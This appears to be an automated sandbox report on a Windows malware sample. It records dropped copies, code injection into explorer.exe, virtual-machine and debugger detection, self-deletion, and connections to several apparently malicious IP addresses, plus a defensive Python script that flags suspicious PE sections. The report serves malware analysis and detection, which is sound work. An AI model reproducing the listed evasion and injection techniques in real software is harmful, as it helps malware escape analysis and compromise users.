                Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: BzLGqYKy7o.exeReversingLabs: Detection: 31%
                Source: unknownProcess created: C:\Users\user\Desktop\BzLGqYKy7o.exe "C:\Users\user\Desktop\BzLGqYKy7o.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\teihrdr C:\Users\user\AppData\Roaming\teihrdr
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B9A0.exe C:\Users\user\AppData\Local\Temp\B9A0.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\teihrdr C:\Users\user\AppData\Roaming\teihrdr
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\jtihrdr C:\Users\user\AppData\Roaming\jtihrdr
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B9A0.exe C:\Users\user\AppData\Local\Temp\B9A0.exeJump to behavior
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jtihrdrSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jtihrdrSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jtihrdrSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jtihrdrSection loaded: msvcr100.dllJump to behavior
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: BzLGqYKy7o.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                Data Obfuscation

                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Unpacked PE file: 0.2.BzLGqYKy7o.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.gol:R;.xowujad:R;.xonag:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\teihrdr | Unpacked PE file: 4.2.teihrdr.400000.0.unpack .text:ER;.rdata:R;.data:W;.gol:R;.xowujad:R;.xonag:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Unpacked PE file: 7.2.B9A0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.fulocu:R;.soro:R;.kefef:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\teihrdr | Unpacked PE file: 8.2.teihrdr.400000.0.unpack .text:ER;.rdata:R;.data:W;.gol:R;.xowujad:R;.xonag:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\jtihrdr | Unpacked PE file: 9.2.jtihrdr.400000.0.unpack .text:ER;.rdata:R;.data:W;.fulocu:R;.soro:R;.kefef:W;.rsrc:R; vs .text:EW;
                Source: BzLGqYKy7o.exe | Static PE information: section name: .gol
                Source: BzLGqYKy7o.exe | Static PE information: section name: .xowujad
                Source: BzLGqYKy7o.exe | Static PE information: section name: .xonag
                Source: B9A0.exe.2.dr | Static PE information: section name: .fulocu
                Source: B9A0.exe.2.dr | Static PE information: section name: .soro
                Source: B9A0.exe.2.dr | Static PE information: section name: .kefef
                Source: jtihrdr.2.dr | Static PE information: section name: .fulocu
                Source: jtihrdr.2.dr | Static PE information: section name: .soro
                Source: jtihrdr.2.dr | Static PE information: section name: .kefef
                Source: teihrdr.2.dr | Static PE information: section name: .gol
                Source: teihrdr.2.dr | Static PE information: section name: .xowujad
                Source: teihrdr.2.dr | Static PE information: section name: .xonag
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Code function: 0_2_004014D9 pushad ; ret 0_2_004014E9
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Code function: 0_2_004031DB push eax; ret 0_2_004032AB
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Code function: 0_2_004E1540 pushad ; ret 0_2_004E1550
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Code function: 0_2_005B3C29 push esp; ret 0_2_005B3C2B
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Code function: 0_2_005B2AC9 pushfd ; iretd 0_2_005B2ACA
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Code function: 0_2_005B1FCC push B63524ADh; retn 001Fh 0_2_005B2003
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 4_2_004014D9 pushad ; ret 4_2_004014E9
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 4_2_004031DB push eax; ret 4_2_004032AB
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 4_2_00601540 pushad ; ret 4_2_00601550
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 4_2_006A33F1 push esp; ret 4_2_006A33F3
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 4_2_006A2291 pushfd ; iretd 4_2_006A2292
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 4_2_006A1794 push B63524ADh; retn 001Fh 4_2_006A17CB
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_0040100B push esi; ret 7_2_0040100C
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_0040280E push esp; ret 7_2_004029C6
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_0040281F push esp; ret 7_2_004029C6
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_00402822 push esp; ret 7_2_004029C6
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_00401328 push edi; retf 7_2_0040132A
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_004027ED push esp; ret 7_2_004029C6
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_004027FB push esp; ret 7_2_004029C6
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_005A1A58 push 9A832F1Fh; iretd 7_2_005A1A5E
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_0059FFD3 push esi; ret 7_2_0059FFD4
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_005A02EA push edi; retf 7_2_005A02EB
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_01FA2889 push esp; ret 7_2_01FA2A2D
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_01FA1386 push edi; retf 7_2_01FA1391
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_01FA2886 push esp; ret 7_2_01FA2A2D
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_01FA1072 push esi; ret 7_2_01FA1073
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_01FA2875 push esp; ret 7_2_01FA2A2D
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_01FA2862 push esp; ret 7_2_01FA2A2D
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_01FA2854 push esp; ret 7_2_01FA2A2D
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_01FA1909 push esp; iretd 7_2_01FA19BF
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 8_2_004014D9 pushad ; ret 8_2_004014E9
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\B9A0.exe
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\teihrdr
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\jtihrdr
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\jtihrdr
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\teihrdr
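                The two traits the listing above flags (section names such as .gol, .xowujad and .xonag that no linker emits, and a .text that is writable in the unpacked image although the file on disk marks it execute/read only) can be checked without a sandbox by reading the section table. The script below is an added example, not code from the Joe Sandbox report or from the sample; it uses only the Python standard library and constructs two minimal PE images inline (the section names follow the listing, the Characteristics flags are assumed, and the images have no section bodies). Run it on a real file by passing the file's bytes to parse_sections(). It also covers the general case the listing does not show, a writable+executable section other than .text.

```python
"""Static check for the 'Data Obfuscation' traits above: non-standard PE section
names and sections that are both writable and executable.  Standard library only;
the two PE images are constructed inline for this example."""
import struct

IMAGE_SCN_CNT_CODE    = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ    = 0x40000000
IMAGE_SCN_MEM_WRITE   = 0x80000000

# Names a normal MSVC/MinGW link produces; anything else deserves a look.
COMMON_SECTION_NAMES = {
    ".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata", ".edata", ".pdata",
    ".bss", ".tls", ".CRT", ".didat", ".gfids", ".00cfg", ".xdata",
}


def parse_sections(image: bytes):
    """Walk DOS header -> PE signature -> COFF header -> section table and
    return [(name, characteristics), ...] in file order."""
    if image[:2] != b"MZ":
        raise ValueError("no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    (num_sections,) = struct.unpack_from("<H", image, coff + 2)
    (opt_size,) = struct.unpack_from("<H", image, coff + 16)
    table = coff + 20 + opt_size                          # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(num_sections):
        # 8-byte name, 28 bytes of sizes/pointers we do not need, 4-byte Characteristics
        raw_name, chars = struct.unpack_from("<8s28xI", image, table + 40 * i)
        sections.append((raw_name.rstrip(b"\0").decode("ascii", "replace"), chars))
    return sections


def perms(chars: int) -> str:
    """Render Characteristics the way the report does (E/R/W letters)."""
    return "".join(letter for letter, bit in (("E", IMAGE_SCN_MEM_EXECUTE),
                                               ("R", IMAGE_SCN_MEM_READ),
                                               ("W", IMAGE_SCN_MEM_WRITE)) if chars & bit)


def find_suspicious(sections):
    """Return one finding string per suspicious trait, in section order."""
    findings = []
    for name, chars in sections:
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            findings.append(f"{name}: writable and executable ({perms(chars)}); "
                            "code that rewrites itself in place, typical of unpacking")
        if name not in COMMON_SECTION_NAMES:
            findings.append(f"{name}: non-standard section name")
    return findings


def build_pe(sections):
    """Constructed minimal PE: DOS stub, PE signature, COFF header with a zero-length
    optional header, and the section table.  No section bodies; enough for parsing."""
    e_lfanew = 0x40
    dos = b"MZ" + bytes(0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x014C, len(sections), 0, 0, 0, 0, 0x0102)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode("ascii").ljust(8, b"\0"),
                    0x1000, 0x1000 * (i + 1), 0x200, 0x400 + 0x200 * i, 0, 0, 0, 0, chars)
        for i, (name, chars) in enumerate(sections))
    return dos + b"PE\0\0" + coff + table


R, RW = IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
CODE_ER = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ

# Section layout as listed for the dropper (names from the report, flags assumed).
STATIC_SAMPLE = build_pe([(".text", CODE_ER), (".rdata", R), (".data", RW), (".gol", R),
                          (".xowujad", R), (".xonag", RW), (".rsrc", R)])
# Same layout with .text made writable, as the unpacked dump shows (.text:EW).
DUMP_SAMPLE = build_pe([(".text", CODE_ER | IMAGE_SCN_MEM_WRITE), (".rdata", R), (".data", RW),
                        (".gol", R), (".xowujad", R), (".xonag", RW), (".rsrc", R)])


def report(image: bytes):
    """Parse, print the section table, and return the findings."""
    sections = parse_sections(image)
    for name, chars in sections:
        print(f"{name:<10} {perms(chars):<3} {chars:#010x}")
    findings = find_suspicious(sections)
    for finding in findings:
        print("  !", finding)
    return findings


if __name__ == "__main__":
    report(STATIC_SAMPLE)
    report(DUMP_SAMPLE)
```

                The on-disk image yields only the three name findings, which is exactly what the static signature lines above report; the dumped image additionally trips the writable+executable check on .text. A non-standard name alone is a weak signal (some packers and compilers use them legitimately), so treat the two findings together, and remember that a packer can also set the flags at run time with VirtualProtect, which this static check cannot see.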

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\explorer.exe | File deleted: c:\users\user\desktop\bzlgqyky7o.exe
                Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\teihrdr:Zone.Identifier read attributes | delete
                Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\jtihrdr:Zone.Identifier read attributes | delete
                Source: C:\Windows\explorer.exe | Process information set (3 times): NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Key enumerated (6 times): HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\teihrdr | Key enumerated (6 times): HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Key enumerated (6 times): HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\teihrdr | Key enumerated (6 times): HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\jtihrdr | Key enumerated (6 times): HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | API/Special instruction interceptor: Address: 7FF8C88EE814
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | API/Special instruction interceptor: Address: 7FF8C88ED584
                Source: C:\Users\user\AppData\Roaming\teihrdr | API/Special instruction interceptor: Address: 7FF8C88EE814
                Source: C:\Users\user\AppData\Roaming\teihrdr | API/Special instruction interceptor: Address: 7FF8C88ED584
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | API/Special instruction interceptor: Address: 7FF8C88EE814
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | API/Special instruction interceptor: Address: 7FF8C88ED584
                Source: C:\Users\user\AppData\Roaming\jtihrdr | API/Special instruction interceptor: Address: 7FF8C88EE814
                Source: C:\Users\user\AppData\Roaming\jtihrdr | API/Special instruction interceptor: Address: 7FF8C88ED584
                Source: jtihrdr, 00000009.00000002.2882496618.000000000056E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ASWHOOK*
                Source: BzLGqYKy7o.exe, 00000000.00000002.2132466453.000000000058E000.00000004.00000020.00020000.00000000.sdmp, B9A0.exe, 00000007.00000002.2644794395.000000000057E000.00000004.00000020.00020000.00000000.sdmp, teihrdr, 00000008.00000002.2780667881.0000000000727000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ASWHOOK
                Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 424
                Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 785
                Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 561
                Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 732
                Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 886
                Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 867
                Source: C:\Windows\explorer.exe TID: 344 | Thread sleep count: 424 > 30
                Source: C:\Windows\explorer.exe TID: 5052 | Thread sleep count: 785 > 30
                Source: C:\Windows\explorer.exe TID: 5052 | Thread sleep time: -78500s >= -30000s
                Source: C:\Windows\explorer.exe TID: 2788 | Thread sleep count: 561 > 30
                Source: C:\Windows\explorer.exe TID: 2788 | Thread sleep time: -56100s >= -30000s
                Source: C:\Windows\explorer.exe TID: 1292 | Thread sleep count: 246 > 30
                Source: C:\Windows\explorer.exe TID: 1272 | Thread sleep count: 267 > 30
                Source: C:\Windows\explorer.exe TID: 1784 | Thread sleep count: 275 > 30
                Source: C:\Windows\explorer.exe TID: 5580 | Thread sleep count: 170 > 30
                Source: C:\Windows\explorer.exe TID: 5524 | Thread sleep count: 111 > 30
                Source: C:\Windows\explorer.exe TID: 1408 | Thread sleep count: 82 > 30
                Source: C:\Windows\explorer.exe TID: 5260 | Thread sleep count: 164 > 30
                Source: C:\Windows\explorer.exe TID: 4308 | Thread sleep count: 115 > 30
                Source: C:\Windows\explorer.exe TID: 5052 | Thread sleep count: 732 > 30
                Source: C:\Windows\explorer.exe TID: 5052 | Thread sleep time: -73200s >= -30000s
                Source: explorer.exe, 00000002.00000000.2117666934.00000000076F8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0r
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTcaVMWare
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000002.00000000.2116701532.0000000003530000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
                Source: explorer.exe, 00000002.00000000.2116701532.0000000003530000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
                Source: explorer.exe, 00000002.00000000.2115964908.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
                Source: explorer.exe, 00000002.00000000.2117666934.00000000076F8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: explorer.exe, 00000002.00000000.2116701532.0000000003530000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
                Source: explorer.exe, 00000002.00000000.2116701532.0000000003530000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware,p
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
                Source: explorer.exe, 00000002.00000000.2115964908.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000002.00000000.2117666934.000000000769A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | System information queried: CodeIntegrityInformation
                Source: C:\Users\user\AppData\Roaming\teihrdr | System information queried: CodeIntegrityInformation
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | System information queried: CodeIntegrityInformation
                Source: C:\Users\user\AppData\Roaming\teihrdr | System information queried: CodeIntegrityInformation
                Source: C:\Users\user\AppData\Roaming\jtihrdr | System information queried: CodeIntegrityInformation
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Process queried: DebugPort
                Source: C:\Users\user\AppData\Roaming\teihrdr | Process queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Process queried: DebugPort
                Source: C:\Users\user\AppData\Roaming\teihrdr | Process queried: DebugPort
                Source: C:\Users\user\AppData\Roaming\jtihrdr | Process queried: DebugPort
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Code function: 0_2_004E092B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Code function: 0_2_004E0D90 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Code function: 0_2_005AFAAD push dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 4_2_0060092B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 4_2_00600D90 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 4_2_0069F275 push dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_0059EE02 push dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_01FA0D90 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_01FA092B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 8_2_0070092B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 8_2_00700D90 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 8_2_00740DF5 push dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\jtihrdr | Code function: 9_2_0052092B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\jtihrdr | Code function: 9_2_00520D90 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\jtihrdr | Code function: 9_2_0058EC2A push dword ptr fs:[00000030h]

                Note on reading these lines: the DebugPort query is NtQueryInformationProcess(ProcessDebugPort), the CodeIntegrityInformation query is NtQuerySystemInformation(SystemCodeIntegrityInformation), and on 32-bit code fs:[30h] is the PEB pointer held in the TEB, where BeingDebugged and NtGlobalFlag live. The function ID prefix (0_, 4_, 7_, 8_, 9_) is the analysed process number, so the same PEB-reading routine is present in the original sample and in every dropped copy.

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Windows\explorer.exe | File created: jtihrdr.2.dr
                Source: C:\Windows\explorer.exe | Network Connect: 188.40.141.211 443
                Source: C:\Windows\explorer.exe | Network Connect: 105.197.97.247 80
                Source: C:\Windows\explorer.exe | Network Connect: 189.195.132.134 80
                Source: C:\Windows\explorer.exe | Network Connect: 23.145.40.164 443
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Thread created: C:\Windows\explorer.exe EIP: 87C19A8
                Source: C:\Users\user\AppData\Roaming\teihrdr | Thread created: unknown EIP: 88019A8
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Thread created: unknown EIP: 9861970
                Source: C:\Users\user\AppData\Roaming\teihrdr | Thread created: unknown EIP: 9EE19A8
                Source: C:\Users\user\AppData\Roaming\jtihrdr | Thread created: unknown EIP: 3181970
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
